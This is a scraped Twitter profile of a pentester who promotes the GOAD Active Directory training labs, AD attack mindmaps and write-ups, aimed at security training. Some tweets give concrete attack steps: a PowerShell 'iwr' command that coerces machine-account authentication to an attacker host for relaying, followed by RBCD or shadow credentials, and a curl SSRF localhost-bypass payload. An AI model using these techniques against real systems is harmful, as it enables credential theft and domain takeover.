Mayfly Profile Banner
Mayfly Profile
Mayfly

@M4yFly

Followers
5,693
Following
768
Media
53
Statuses
467

Former Dev and DevOps| Pentester and red teamer at orange cyberdefense | OSCE³| Tweet are my own| discord: m4yfly

Joined November 2017
Don't wanna be here? Send us removal request.
Explore trending content on Musk Viewer
Pinned Tweet
@M4yFly
Mayfly
2 years
GOAD v2 is out ! You can now test your AD commands and pentest skill on a multi-domain AD lab. Have fun :)
Tweet media one
47
453
1K
@M4yFly
Mayfly
3 years
AD Pentest mindmap upgrade : Full version: xmind version (slow, the map is big) : Fell free to tell me what is missing !
Tweet media one
28
742
2K
@M4yFly
Mayfly
2 years
Welcome to the new AD Mindmap upgrade ! v2022_11 will be dark only (this is too painful to maintain two versions). Thx again to : @Vikingfr and @Sant0rryu for their help 👍 Full quality and zoomable version here : Overview :
Tweet media one
40
452
1K
@M4yFly
Mayfly
4 years
My little mindmap to pentest active directory. Full version here :
Tweet media one
18
455
1K
@M4yFly
Mayfly
8 months
Did you know you didn't need to use a potatoes exploit to going from iis apppool account to admin or system ? Simply use: powershell iwr http://192.168.56.1 -UseDefaultCredentials To get an HTTP coerce of the machine account. 👇🧵
Tweet media one
8
163
617
@M4yFly
Mayfly
11 months
A new Lab 🏰 is available on GOAD: NHA. This time it is a challenge, 5 vms, you start with no account and try to get domain admin on the two domains. Have fun !
Tweet media one
9
163
477
@M4yFly
Mayfly
1 year
Complete guide to deploy GOAD on Proxmox is ready 🥳 - part 1: Proxmox + pfsense - part 2: template with packer - part 3: providing with terraform - part 4: provisioning with ansible - part 5: add openvpn access =>
Tweet media one
Tweet media two
10
160
467
@M4yFly
Mayfly
11 months
GOAD update available 🥳 - Azure provider is now supported thx to @Zeph_RooT ! - Two versions of the lab are available (A light version with 3 computers has been added). - Some scripts to help install. - Refactoring to simplify adding lab and providers.
Tweet media one
14
153
466
@M4yFly
Mayfly
2 years
Mindmap upgrade version 2023_02 thx to @Jenaye_fr and @DaahtK for the help. Full quality here :
Tweet media one
13
158
451
@M4yFly
Mayfly
8 months
Goad small update ! 🏰 🥳 i added scenarios to complete some compromise path. - files with secrets in shares - gmsa account - asrep account on essos - write dacl on container - unconstrained delegation on user - protected user - sensitive user - ppl
Tweet media one
8
110
434
@M4yFly
Mayfly
3 years
If you want to play with an Active Directory lab. Here is the "Game Of Active Directory" project. Still a lot of stuff to add but already fun to play with ;)
0
156
415
@M4yFly
Mayfly
6 months
New lab 🏰 for the GOAD project 🥳: SCCM You can now test the SCCM/MECM attacks locally on Virtualbox or Vmware. More information here: Repository here : Thx again @KenjiEndo15 for your help to building this !
Tweet media one
8
146
356
@M4yFly
Mayfly
2 years
Goad writeup part 11 is up. This one is about acl/ace exploitation.
Tweet media one
8
100
321
@M4yFly
Mayfly
2 years
The answer is not simple ^^ a small thread 🧵
@tK4w8TmK40dNU0a
Southern mountains
2 years
@M4yFly Hello! your research is great🍻 The path in the figure, how to obtain the domain admin?
Tweet media one
1
1
9
4
76
303
@M4yFly
Mayfly
2 years
Finally, the last part of GOAD writeups is done ! 🥳 Part 12 : Trusts
Tweet media one
13
105
288
@M4yFly
Mayfly
5 months
SCCM lab write up 📝 started: - Part 0x1 : Basic Recon & PXE exploit - Part 0x2 : Low user exploitation
Tweet media one
1
90
270
@M4yFly
Mayfly
2 years
AD mindmap update (now in svg 🥳 ): - white background: - black background: Thanks to @Vikingfr and @Sant0rryu for the help ! As always xmind sources are available here :
Tweet media one
1
117
260
@M4yFly
Mayfly
2 years
CVE-2022-35914 - GLPI unauthenticated RCE with htmlawed lib TL;DR
Tweet media one
2
75
193
@M4yFly
Mayfly
5 months
SCCM Lab write up 📝part 0x3 is out: - Exploit as client admin - Exploit as sccm admin Find all the articles about the SCCM laboratory exploitation here :
Tweet media one
1
71
183
@M4yFly
Mayfly
1 year
Yeah ! 🥳🥳🥳 Thx a lot @offsectraining for all these courses, challenges and certifications !
Tweet media one
15
6
178
@M4yFly
Mayfly
2 years
Let's play with the ad lab, goadv2:
Tweet media one
2
68
164
@M4yFly
Mayfly
2 years
Major GOAD refactor and update today 🥳 Add RDP bot user Add Webdav support Ansible inventory was refactored, you can now find it on the lab folder (ad/sevenkingdoms.local/inventory). And now you can easily build your own lab from the template :
3
21
104
@M4yFly
Mayfly
2 years
Play with the ad lab goadv2 - part 10 : delegations - constrained - unconstrained (with and without protocol transition) - resource based
4
32
96
@M4yFly
Mayfly
2 years
Let's continue to pwn GOAD for fun and no profit :) We will have fun with ADCS this time, thanks a lot to @ly4k_ for the certify tool 🙏
Tweet media one
2
29
78
@M4yFly
Mayfly
4 years
As you ask, sources of the mindmap can be found here : The commands are also available on the arsenal cheatsheet tool : The mindmap wil be versionned here : And btw, i love pull request ;)
0
36
78
@M4yFly
Mayfly
3 years
Mindmap Update with the new kids in town (log4j / samAccountName/...) black version : white version : As usuall fell free to tell us if there is any mistake and what is missing ;) Thx to @Vikingfr for is help !
Tweet media one
3
33
73
@M4yFly
Mayfly
4 years
Thx to @snovvcrash for his awesome pull request ! An exchange server pentest mindmap. All credits belong to him. It's a very nice work 👍 full version here :
Tweet media one
0
21
69
@M4yFly
Mayfly
3 years
black version :
Tweet media one
1
21
61
@M4yFly
Mayfly
3 years
I was tired to find websites version on black box pentest (you know when all the classic files don't leak the version and you have trouble to identify it) If you are in the same case you could give a try to this tool (compare statics files with a git repo)
1
10
39
@M4yFly
Mayfly
6 months
4 Vms to play with :) Thx also to @Sant0rryu for the beta test !
Tweet media one
1
8
35
@M4yFly
Mayfly
8 months
than relay to Ldap and : - start_tls + add a computer to the domain + RBCD or - shadow credentials Example with RBCD :
Tweet media one
1
3
34
@M4yFly
Mayfly
2 years
@Djax_Alpha @TCMSecurity If you want them to learn AD i recommend those read : - - - - - - - -
1
7
24
@M4yFly
Mayfly
2 years
And you can now do a shadow credentials on the dc and own the domain :)
Tweet media one
Tweet media two
1
0
23
@M4yFly
Mayfly
3 years
Arsenal v1.1.0 With new features : - Add yml support to cheatsheets (thx @swuitch ) - Add fzf on arguments research (thx @_mgp25 ) To install : python3 -m pip install arsenal-cli
0
6
24
@M4yFly
Mayfly
8 months
And then enjoy your shell as administrator 🥳 (or directly use psexec to get system)
Tweet media one
0
2
21
@M4yFly
Mayfly
2 years
@_Nidouille_ @xhark J'aime bien voir mon boulot circuler sur internet. Je fais ça pour le partage avant tout donc ça fait plaisir, peut importe le crédit. Par contre faudrait prendre la version à jour svp 😉 (et encore elle mériterait un bon upgrade)
3
2
19
@M4yFly
Mayfly
4 years
My last root-me challenge is finally publicly available \o/ Give it a try ;)
0
5
17
@M4yFly
Mayfly
2 years
Tweet media one
0
0
14
@M4yFly
Mayfly
6 months
@MJHallenbeck i think i got something for you ;)
@M4yFly
Mayfly
6 months
New lab 🏰 for the GOAD project 🥳: SCCM You can now test the SCCM/MECM attacks locally on Virtualbox or Vmware. More information here: Repository here : Thx again @KenjiEndo15 for your help to building this !
Tweet media one
8
146
356
1
1
12
@M4yFly
Mayfly
8 months
@lkarlslund For those who take it seriously, small reminder. Goad is a training lab, not a chall. If you want a chall try NHA 😉
1
0
9
@M4yFly
Mayfly
2 years
@_nwodtuhs @antoineQu @byt3bl33d3r Thx buddy 😉 With @Vikingfr we setup a website to show the mindmap in svg, without quality loss. (If you look the svg on icons are not loaded due to csp)
0
3
10
@M4yFly
Mayfly
2 years
@exploitph @Microsoft Works perfectly ! Thank you 🙏
Tweet media one
0
0
9
@M4yFly
Mayfly
2 years
upgrade content : - certpatatoes () - ldeep () - impacket trust commands () - irs ()
1
0
8
@M4yFly
Mayfly
2 years
Now you can change groups that have inheritance enable. (You are not allowed to change Domain Admins or other sensitive groups or users with inheritance disable). But Key Admins seem to be a good target.
Tweet media one
Tweet media two
2
1
9
@M4yFly
Mayfly
4 years
@_nwodtuhs @FrenchKey_fr i recommend you the Lockpickinglawyer videos : (if you don't already know this channel, i am not responsible for the hours you will spend on it ;) )
1
0
8
@M4yFly
Mayfly
2 years
- Steal rdp session - impersonate cme module - Some azure adconnect stuff - cme module drop-sc - cme module slinky - and other stuffs ...
2
0
7
@M4yFly
Mayfly
2 years
As always if you see any mistake feel free to contact us ;)
0
1
7
@M4yFly
Mayfly
5 months
@petruknisme @KenjiEndo15 Ok, this should work on proxmox now ;)
Tweet media one
1
0
7
@M4yFly
Mayfly
2 years
So you have genericAll on the Users container. The first thing to do is check the inheritance.
Tweet media one
1
0
7
@M4yFly
Mayfly
2 years
@n00py1 The official mitigation page say () "Additional mitigation : Disable NTLM on any AD CS Servers in your domain using the group policy Network security: Restrict NTLM: Incoming NTLM traffic." Try by relaying a server maybe ?
1
0
5
@M4yFly
Mayfly
3 years
@sagaryadav8742 Receiving Java version doesn't proof if the target is vulnerable or not! it only show you if you can use remote class loading. Please read this :
1
0
6
@M4yFly
Mayfly
2 years
@ccrraamm @0xConda Yes I deleted the xmind link as it is not up to date, and I see it everywhere without credits... The last updated version can be found here : I still have to add some new technics like krbrelayup. So a new version will come soon 👍
@M4yFly
Mayfly
2 years
AD mindmap update (now in svg 🥳 ): - white background: - black background: Thanks to @Vikingfr and @Sant0rryu for the help ! As always xmind sources are available here :
Tweet media one
1
117
260
1
0
6
@M4yFly
Mayfly
11 months
@jessefmoore Sry it is not an azure security lab. It is just goad deployed on azure too. 😅
1
0
4
@M4yFly
Mayfly
5 months
Tweet media one
2
0
5
@M4yFly
Mayfly
11 months
@vendetce @mpgn_x64 @n00py1 Or drop the mic and shadow creds 😉
2
1
5
@M4yFly
Mayfly
4 years
@titnounourse Still in a work in progress state, and far from beeing finish ^^
0
2
4
@M4yFly
Mayfly
2 years
@makcimalex Sure i will continue the development. And i also really want an automatic build for wsus and exchange ^^ This will come,...one day when i will get the time to do it ;)
0
0
5
@M4yFly
Mayfly
2 years
Now you can change your rights to give you inheritance.
Tweet media one
Tweet media two
1
0
5
@M4yFly
Mayfly
2 years
- and certsync ! ()
1
0
4
@M4yFly
Mayfly
3 years
@cfreal_ Thx @cfreal_ It is just a POC for now. It need more work to manage multiples vectors and packages 😅
1
0
4
@M4yFly
Mayfly
2 years
@Djax_Alpha @TCMSecurity If you want to train them for free or few $ - (computer to practice the fr course) - (some realist challenges) - - (labs and some machines with AD) - ;)
0
0
4
@M4yFly
Mayfly
3 years
@NandanLohitaksh This one missing :
0
0
4
@M4yFly
Mayfly
8 months
@the_ibra_him @binaryz0ne Thanks. What explanation do you need ? I wrote a guide to exploit it here if that you need :
2
1
4
@M4yFly
Mayfly
2 years
@Bdenneu @tiraniddo Nice work ! 🔥
Tweet media one
0
0
4
@M4yFly
Mayfly
8 months
@saerxcit @mpgn_x64 Ok found out a great article about tgtdeleg explained by @harmj0y This doesn't work on an up to date windows server 2019. At least it work well on an old windows server 2016. This has been patched ?
Tweet media one
Tweet media two
3
1
5
@M4yFly
Mayfly
2 years
If you got "this object only" first you have to change that.
Tweet media one
3
0
4
@M4yFly
Mayfly
2 years
@akinog1 @AliBawazeEer Maybe with some terraform-fu, it could be deployed on azure easily. @chvancooten have done a really nice work on azure deployment on his lab : This will be a nice source of inspiration 👍 But for this i will have to rollback some kb to setup some vulns 😅
1
1
4
@M4yFly
Mayfly
8 months
0
0
4
@M4yFly
Mayfly
8 months
@pentest_soka @saerxcit @mpgn_x64 @harmj0y Thx to @yaumn_ mystery solve! The SPN was override in one of my scripts 😅
Tweet media one
1
0
4
@M4yFly
Mayfly
6 years
Timisoara 2018 - CTF - web - bookdir 1 & 2 @Beers4Flags @TimisoaraCTF
0
0
3
@M4yFly
Mayfly
8 months
@IdleWog Sure you can update. Replay the install, it will add the missing features 😉 Also i fixed some dns issues
2
0
3
@M4yFly
Mayfly
2 years
@vendetce You could try, i didn't test it 😅. But the images are available on vmware too. So maybe a small modification on the vagrantfile is enought to make it work. I will give it a try when i get the time to do it 😉
1
0
3
@M4yFly
Mayfly
11 months
@philosophene Bing ai image generator give the N with II. I thought it was nice so I left it as is. 😁
1
0
2
@M4yFly
Mayfly
6 years
@Maki_chaz @_SIben_ @swuitch Excellent article, juste quelques remarques sur la partie red : pour la wordlist : cewl fait bien le taf () pour la ssrf avec mysql j'ai vu ce tool aussi :
0
0
3
@M4yFly
Mayfly
6 years
@Maki_chaz @_SIben_ @swuitch A noter aussi que la restriction de la SSRF sur localhost se bypass bien. ça tombe dans les cas décrits par orangetsai avec à la fois du parse_url et du curl: curl http://url/test.php -d 'url= http://[email protected]:80 @localhost /'
0
0
3
@M4yFly
Mayfly
4 years
@N7WEra Nice 👍 Plz take the link to the versionned mindmap to get the updates :
0
2
3
@M4yFly
Mayfly
3 years
@EvilOrez Thx! About the responder redirect to pth, you can't do that with netntlm hash and you have to crack it or relay it. May be you confuse the type of hash and response (I know thoses names...) . Give a look at this chart made by @_nwodtuhs 😉
@_nwodtuhs
Charlie Bromberg « Shutdown »
3 years
Mindmap 🧠 for pass-the-whatever and common attacks operated on Active Directory authentication protocols (NTLM, Kerberos) ➡️ Featured on
Tweet media one
16
361
980
0
0
2
@M4yFly
Mayfly
2 years
@RandoriSec @_Barney0 Ah ben ça va, vous vous mettez bien chez randori ! Congrats @_Barney0 🥳, le bonjour à @Phenol__ quand tu le croiseras 😉
0
0
3
@M4yFly
Mayfly
2 years
@_nwodtuhs Nice, my pr for mssqlclient is in. Thank you @_nwodtuhs 🙏
0
0
3
@M4yFly
Mayfly
3 years
When you are looking for #log4shell trace of exploitation. On java11 with an exploit by reference on Tomcat. - You are looking for an output TCP connection to the rogue JNDI. - And in the java logs created by log4j the only thing you will get is "javax.el.ElProcessor@..."
Tweet media one
Tweet media two
0
1
3
@M4yFly
Mayfly
2 years
@_hilarex Great work ! Thank you for sharing 👍
0
0
3
@M4yFly
Mayfly
8 months
@rayanlecat @assume_breach Nice but some things are missing. Like python venv, ansible install, some libs like rsync and ansible-galaxy requirements. Also do not run goad script as root it will create vm for root user in virtualbox instead of your user. 😉
1
0
1
@M4yFly
Mayfly
3 years
And thx to @_nwodtuhs / @carlospolopm / @pentest_swissky for thoses bibles 🙏
2
1
2